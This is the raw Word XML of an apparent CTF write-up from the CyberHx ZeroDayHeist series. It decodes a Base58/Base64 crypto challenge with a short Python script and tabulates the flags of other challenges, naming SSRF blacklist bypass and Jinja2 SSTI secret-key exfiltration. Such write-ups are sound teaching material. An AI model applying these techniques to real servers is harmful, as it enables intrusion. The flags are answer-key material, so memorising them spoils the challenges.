    <w:p w14:paraId="74C99F0A" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80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2C2C2C"/>
        </w:rPr>
        <w:t>The raw ciphertext contains invalid Base58 characters ($, -, %, !, *, spaces) — these are red herrings and must be stripped first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E728F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Raw input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C2A2E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J$om-yF!J8H*Uk H-Uo$Qa!c2-rg6*Bb!xg$Xv-dw%tr5tA3o7s3x9q3sQVq9R22jofkUH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B1070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5902577A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Strip non-Base58 chars ($, -, %, !, *, spaces):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2C567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JomyFJ8HUkHUoQac2rg6BbxgXvdwtr5tA3o7s3x9q3sQVq9R22jofkUH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBBD158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0F5AD70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Base58 decode result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF86BB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lastRenderedPageBreak/>
        <w:t>Q1lCRVJIWHtDcnlwdDBfZ3I0cGh5XzFzX2Z1Tn0K   &lt;- looks like Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748C6C3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Layer 2 — Base64 Decode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFDEFA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Base64 decode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0623D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Q1lCRVJIWHtDcnlwdDBfZ3I0cGh5XzFzX2Z1Tn0K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4825A64F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=&gt;  CYBERHX{Crypt0_gr4phy_1s_fuN}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A111E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Python Quick Solve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FA5B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import base64, base58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3825DE1C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1FC6B6A9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raw = 'JomyFJ8HUkHUoQac2rg6BbxgXvdwtr5tA3o7s3x9q3sQVq9R22jofkUH'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A26BF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0E8D2D74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Layer 1: Base58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59157A3B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b58_decoded = base58.b58decode(raw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF0107" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00D5087C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:ind w:left="360" w:right="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD729FA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# Layer 2: Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6572641D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flag = base64.b64decode(b58_decoded).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707795F5" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:ind w:left="360" w:right="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print(flag)  # CYBERHX{Crypt0_gr4phy_1s_fuN}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C0C7A6" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="00B4D8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="0A2342"/>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>🚩</w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  FLAG: </w:t>
      </w:r>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF41"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CYBERHX{Crypt0_gr4phy_1s_fuN}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB7F7A9" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3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t>Decode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5087C" w:rsidRPr="0011240C" w14:paraId="22AAF67D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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C564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Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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739B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Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="368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D8D3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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="65A8A5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D91A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0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7D0F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Identify noise characters in raw ciphertext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6E49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Detected: $, -, %, !, *, spaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="714C23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0A2C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F0E8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Strip noise chars from raw input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D397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Clean Base58 string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="7BEB73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783C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2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5928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Base58 decode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38AE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Q1lCRVJI...Tn0K (Base64 string)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="6DEF99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84C6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3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58CC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Base64 decode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8525" w14:textId="21518F3C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CYBERHX{Crypt0</w:t>
            </w:r>
            <w:r w:rsidR="007D3229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_</w:t>
            </w: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gr4phy_1s_fuN}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BE6AB3C" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43D12B" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00B4D8"/>
        </w:pBdr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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Overall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2"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="2670"/>
        <w:gridCol w:w="3223"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="77555AFB" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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5D8C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Challenge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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B8AD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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="316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7F37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Key Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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4DEC" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="59D4F5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3FF4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Terminal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355A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OSINT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A2FF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Website enumeration, terminal widget interaction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00A8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CyberHx{y8u_d1d_1t}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="7FBA1BB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3284C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Phantom Cipher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DC00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Steg + Crypto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D786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LSB extraction (PIL), Vigenere-variant decryption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FC54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CyberHx{phantom_signal_recovered}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="62AAA9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6AB2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Professor Mind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EF53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SSRF + File Read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39FE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Blacklist bypass (127.0.0.1), internal API enum, token-based read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7C0C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Zer0d4yh31st{d34d_m3n_t3ll_n0_t4l3s}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="2CC6D9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4ED0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Bella Ciao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6046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SSTI + Session Forge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27AE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Jinja2 {{config}} dump, Flask secret key exfil, privilege escalation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3EA4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Zer0d4yh31st{sst1_t0_rce_b3ll4_c14o}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5087C" w:rsidRPr="0011240C" w14:paraId="623706D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CD83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Crypto is Fun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0810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Multi-layer Encoding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0FBF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Noise stripping, Base58 decode, Base64 decode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0C99" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0011240C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CYBERHX{Crypt0_gr4phy_1s_fuN}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="740F892D" w14:textId="77777777" w:rsidR="00D5087C" w:rsidRPr="0011240C" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="400" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011240C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="999999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CyberHx CTF — ZeroDayHeist Series  •  June 2026</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D5087C" w:rsidRPr="001124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B5A98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F143FC4"/>
    <w:lvl w:ilvl="0" w:tplc="B0485864">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="51DA7936">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="915AC590">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DC58A082">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1DDCF256">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="70EC91CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FF388E12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C8CE3D4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="90FC83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FF3673"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36721A7C"/>
    <w:lvl w:ilvl="0" w:tplc="7CB0E6AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="448AC342">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="47C4B530">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="83640CF0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A5A63938">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="894E00FC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="13E48AF6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6464C4C0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="81F646DA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1848982312">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="6783935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87C"/>
    <w:rsid w:val="0011240C"/>
    <w:rsid w:val="002530C0"/>
    <w:rsid w:val="0039319E"/>
    <w:rsid w:val="00394200"/>
    <w:rsid w:val="00504552"/>
    <w:rsid w:val="006026F3"/>
    <w:rsid w:val="006D1AB5"/>
    <w:rsid w:val="00711AC3"/>
    <w:rsid w:val="007D3229"/>
    <w:rsid w:val="00AE5E00"/>
    <w:rsid w:val="00B65528"/>
    <w:rsid w:val="00D5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17CA4"/>
  <w15:docId w15:val="{66A1945C-70CA-4C25-9A14-6BCC0615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A2342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0B4D8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A3C5E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1527</Words>
  <Characters>8705</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>72</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Dũng Nguyễn Hữu</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-06T11:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-06T16:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>